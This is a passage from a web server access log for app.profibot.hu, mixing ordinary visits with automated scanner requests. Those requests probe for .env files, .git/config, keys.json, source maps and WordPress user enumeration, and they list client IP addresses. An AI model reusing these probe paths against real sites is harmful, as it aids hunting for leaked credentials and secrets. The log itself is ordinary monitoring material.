(l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[20/Jan/2026:19:16:00 +0000] - 404 404 - GET http app.profibot.hu "/.git/config" [Client 159.89.174.87] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[20/Jan/2026:19:16:01 +0000] - 404 404 - GET https app.profibot.hu "/.env" [Client 68.183.180.73] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[20/Jan/2026:19:16:02 +0000] - 404 404 - GET http app.profibot.hu "/s/830323e23383e22383e21393/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties" [Client 159.89.174.87] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[20/Jan/2026:19:16:02 +0000] - 404 404 - GET http app.profibot.hu "/config.json" [Client 159.89.174.87] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[20/Jan/2026:19:16:03 +0000] - 404 404 - GET https app.profibot.hu "/.git/config" [Client 68.183.180.73] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[20/Jan/2026:19:16:03 +0000] - 404 404 - GET http app.profibot.hu "/telescope/requests" [Client 159.89.174.87] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[20/Jan/2026:19:16:04 +0000] - 404 404 - GET https app.profibot.hu "/s/830323e23383e22383e21393/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties" [Client 68.183.180.73] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[20/Jan/2026:19:16:04 +0000] - 404 404 - GET http app.profibot.hu "/info.php" [Client 159.89.174.87] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[20/Jan/2026:19:16:05 +0000] - 404 404 - GET https app.profibot.hu "/config.json" [Client 68.183.180.73] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[20/Jan/2026:19:16:06 +0000] - 200 200 - GET http app.profibot.hu "/?rest_route=/wp/v2/users/" [Client 159.89.174.87] [Length 1695] [Gzip 2.43] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[20/Jan/2026:19:16:06 +0000] - 404 404 - GET https app.profibot.hu "/telescope/requests" [Client 68.183.180.73] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[20/Jan/2026:19:16:07 +0000] - 404 404 - GET https app.profibot.hu "/info.php" [Client 68.183.180.73] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[20/Jan/2026:19:16:08 +0000] - 200 200 - GET https app.profibot.hu "/?rest_route=/wp/v2/users/" [Client 68.183.180.73] [Length 1695] [Gzip 2.43] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[20/Jan/2026:19:16:36 +0000] - 404 404 - HEAD https app.profibot.hu "/.env" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to 192.168.100.43] "Python/3.13 aiohttp/3.11.18" "-" +[20/Jan/2026:19:16:36 +0000] - 404 404 - HEAD https app.profibot.hu "/.env.local" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to 192.168.100.43] "Python/3.13 aiohttp/3.11.18" "-" +[20/Jan/2026:19:16:36 +0000] - 404 404 - HEAD https app.profibot.hu "/.env.prod" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to 192.168.100.43] "Python/3.13 aiohttp/3.11.18" "-" +[20/Jan/2026:19:16:36 +0000] - 404 404 - HEAD https app.profibot.hu "/.env.dev" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to 192.168.100.43] "Python/3.13 aiohttp/3.11.18" "-" +[20/Jan/2026:19:16:44 +0000] - - 400 - GET http app.profibot.hu "/" [Client 185.253.160.139] [Length 654] [Gzip -] [Sent-to ] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36" "-" +[20/Jan/2026:19:16:44 +0000] - 200 200 - GET http app.profibot.hu "/" [Client 146.70.39.146] [Length 1695] [Gzip 2.43] [Sent-to 192.168.100.43] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36" "-" +[20/Jan/2026:19:16:44 +0000] - 404 404 - GET http app.profibot.hu "/favicon.ico" [Client 146.70.39.146] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36" "-" +[20/Jan/2026:19:16:54 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 104.252.191.143] [Length 1695] [Gzip 2.43] [Sent-to 192.168.100.43] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36" "-" +[20/Jan/2026:19:16:54 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 103.196.9.106] [Length 1695] [Gzip 2.43] [Sent-to 192.168.100.43] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" "-" +[20/Jan/2026:19:17:00 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 104.252.191.143] [Length 1695] [Gzip 2.43] [Sent-to 192.168.100.43] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36" "-" +[20/Jan/2026:19:17:20 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 119.13.206.7] [Length 1695] [Gzip 2.43] [Sent-to 192.168.100.43] "Mozilla/5.0 (iPhone; CPU iPhone OS 18_7_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/143.0.7499.151 Mobile/15E148 Safari/604.1" "-" +[20/Jan/2026:19:17:20 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 188.94.84.212] [Length 1695] [Gzip 2.43] [Sent-to 192.168.100.43] "Mozilla/5.0 (iPhone; CPU iPhone OS 18_7_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/143.0.7499.151 Mobile/15E148 Safari/604.1" "-" +[20/Jan/2026:19:17:21 +0000] - 200 200 - GET https app.profibot.hu "/api/vehicles" [Client 188.94.84.212] [Length 1555] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (iPhone; CPU iPhone OS 18_7_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/143.0.7499.151 Mobile/15E148 Safari/604.1" "https://app.profibot.hu/" +[20/Jan/2026:19:17:21 +0000] - 404 404 - GET https app.profibot.hu "/favicon.ico" [Client 180.149.27.39] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (iPhone; CPU iPhone OS 18_7_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/143.0.7499.151 Mobile/15E148 Safari/604.1" "https://app.profibot.hu/" +[20/Jan/2026:19:17:21 +0000] - 200 200 - GET https app.profibot.hu "/api/vehicles" [Client 119.13.206.7] [Length 1555] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (iPhone; CPU iPhone OS 18_7_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/143.0.7499.151 Mobile/15E148 Safari/604.1" "https://app.profibot.hu/" +[20/Jan/2026:19:17:21 +0000] - 404 404 - GET https app.profibot.hu "/favicon.ico" [Client 188.94.84.212] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (iPhone; CPU iPhone OS 18_7_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/143.0.7499.151 Mobile/15E148 Safari/604.1" "https://app.profibot.hu/" +[20/Jan/2026:19:18:13 +0000] - 404 404 - HEAD https app.profibot.hu "/.env" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to 192.168.100.43] "Python/3.13 aiohttp/3.11.18" "-" +[20/Jan/2026:19:18:13 +0000] - 404 404 - HEAD https app.profibot.hu "/.env.local" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to 192.168.100.43] "Python/3.13 aiohttp/3.11.18" "-" +[20/Jan/2026:19:18:13 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 37.76.10.158] [Length 1695] [Gzip 2.43] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[20/Jan/2026:19:18:13 +0000] - 404 404 - HEAD https app.profibot.hu "/.env.prod" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to 192.168.100.43] "Python/3.13 aiohttp/3.11.18" "-" +[20/Jan/2026:19:18:13 +0000] - 404 404 - HEAD https app.profibot.hu "/.env.dev" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to 192.168.100.43] "Python/3.13 aiohttp/3.11.18" "-" +[20/Jan/2026:19:18:13 +0000] - 200 200 - GET https app.profibot.hu "/api/vehicles" [Client 37.76.10.158] [Length 1555] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://app.profibot.hu/" +[20/Jan/2026:19:18:13 +0000] - 404 404 - GET https app.profibot.hu "/favicon.ico" [Client 37.76.10.158] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://app.profibot.hu/" +[20/Jan/2026:19:18:46 +0000] - 200 200 - GET http app.profibot.hu "/" [Client 192.175.111.254] [Length 4092] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[20/Jan/2026:19:18:47 +0000] - 404 404 - HEAD https app.profibot.hu "/.env" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to 192.168.100.43] "Python/3.13 aiohttp/3.11.18" "-" +[20/Jan/2026:19:18:47 +0000] - 404 404 - HEAD https app.profibot.hu "/.env.local" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to 192.168.100.43] "Python/3.13 aiohttp/3.11.18" "-" +[20/Jan/2026:19:18:47 +0000] - 404 404 - HEAD https app.profibot.hu "/.env.prod" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to 192.168.100.43] "Python/3.13 aiohttp/3.11.18" "-" +[20/Jan/2026:19:18:47 +0000] - 404 404 - HEAD https app.profibot.hu "/.env.dev" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to 192.168.100.43] "Python/3.13 aiohttp/3.11.18" "-" +[20/Jan/2026:19:18:47 +0000] - 200 200 - GET http app.profibot.hu "/" [Client 64.15.129.101] [Length 4092] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[20/Jan/2026:19:18:48 +0000] - 404 404 - GET http app.profibot.hu "/favicon.ico" [Client 192.175.111.239] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[20/Jan/2026:19:18:48 +0000] - 200 200 - GET http app.profibot.hu "/" [Client 64.15.129.122] [Length 4092] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[20/Jan/2026:19:18:49 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 64.15.129.124] [Length 4092] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[20/Jan/2026:19:18:49 +0000] - 200 200 - GET http app.profibot.hu "/" [Client 192.175.111.235] [Length 4092] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[20/Jan/2026:19:20:47 +0000] - 405 405 - HEAD https app.profibot.hu "/" [Client 146.70.185.32] [Length 0] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" "-" +[20/Jan/2026:19:22:20 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 18.232.152.226] [Length 1695] [Gzip 2.43] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36" "-" +[20/Jan/2026:19:22:23 +0000] - 200 200 - GET https app.profibot.hu "/api/vehicles" [Client 18.232.152.226] [Length 1555] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36" "https://app.profibot.hu/" +[20/Jan/2026:19:22:23 +0000] - 404 404 - GET https app.profibot.hu "/favicon.ico" [Client 18.232.152.226] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36" "https://app.profibot.hu/" +[20/Jan/2026:19:22:28 +0000] - 404 404 - GET https app.profibot.hu "/favicon.ico" [Client 18.232.152.226] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36" "-" +[20/Jan/2026:19:22:40 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 54.86.115.253] [Length 4092] [Gzip -] [Sent-to 192.168.100.43] "-" "-" +[20/Jan/2026:19:23:43 +0000] - 405 405 - HEAD https app.profibot.hu "/" [Client 193.19.82.13] [Length 0] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" +[20/Jan/2026:19:24:46 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 34.32.245.36] [Length 2485] [Gzip 2.79] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:115.3.0) Gecko/20100101 Firefox/115.3.0" "-" +[20/Jan/2026:19:30:25 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 44.192.247.251] [Length 2982] [Gzip 3.09] [Sent-to 192.168.100.43] "okhttp/5.3.0" "-" +[20/Jan/2026:19:30:25 +0000] - 404 404 - GET https app.profibot.hu "/favicon.ico" [Client 44.192.247.251] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "okhttp/5.3.0" "-" +[20/Jan/2026:19:30:25 +0000] - 404 404 - GET https app.profibot.hu "/favicon.png" [Client 44.192.247.251] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "okhttp/5.3.0" "-" +[20/Jan/2026:19:31:54 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 37.76.44.16] [Length 2982] [Gzip 3.09] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[20/Jan/2026:19:31:55 +0000] - 200 200 - GET https app.profibot.hu "/api/vehicles" [Client 37.76.44.16] [Length 1555] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://app.profibot.hu/" +[20/Jan/2026:19:31:55 +0000] - 404 404 - GET https app.profibot.hu "/favicon.ico" [Client 37.76.44.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://app.profibot.hu/" +[20/Jan/2026:19:36:33 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 18.232.51.119] [Length 2982] [Gzip 3.09] [Sent-to 192.168.100.43] "okhttp/5.3.0" "-" +[20/Jan/2026:19:36:33 +0000] - 404 404 - GET https app.profibot.hu "/favicon.ico" [Client 18.232.51.119] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "okhttp/5.3.0" "-" +[20/Jan/2026:19:36:33 +0000] - 404 404 - GET https app.profibot.hu "/favicon.png" [Client 18.232.51.119] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "okhttp/5.3.0" "-" +[20/Jan/2026:19:37:12 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 18.232.51.119] [Length 2982] [Gzip 3.09] [Sent-to 192.168.100.43] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/138.0.7204.23 Safari/537.36" "-" +[20/Jan/2026:19:37:12 +0000] - 200 200 - GET https app.profibot.hu "/api/vehicles" [Client 18.232.51.119] [Length 1555] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/138.0.7204.23 Safari/537.36" "https://app.profibot.hu/" +[20/Jan/2026:19:37:12 +0000] - 404 404 - GET https app.profibot.hu "/favicon.ico" [Client 18.232.51.119] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/138.0.7204.23 Safari/537.36" "https://app.profibot.hu/" +[20/Jan/2026:19:41:01 +0000] - 200 200 - GET http app.profibot.hu "/" [Client 91.231.89.17] [Length 9183] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/asset-manifest.json" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/stripe.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/subscribe" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/settings.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/dist/bundle.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/public/build/root.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/.vite/manifest.json" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/app.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/api.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/svelte.config.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/.env.vite" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/_nuxt/vendors.app.js.map" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/payment.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/_next/static/chunks/webpack.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/main.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/_next/static/chunks/1.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/build/index.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/_next/static/chunks/2.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/.vite/deps/_metadata.json" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/_app/immutable/entry/start.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/page-data/app-data.json" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/_app/immutable/entry/app.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/public/js/app.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/static/js/4.chunk.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/vendor.js.map" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/assets/main.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/main.js.map" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/keys.json" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/_app/env.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/chunk.js.map" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/build/main.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/index.html" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/dist/.vite/manifest.json" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/service-worker.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/_next/static/chunks/_ssgManifest.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/build/app.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/config/keys.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/build/bundle.js.map" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/api/config" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 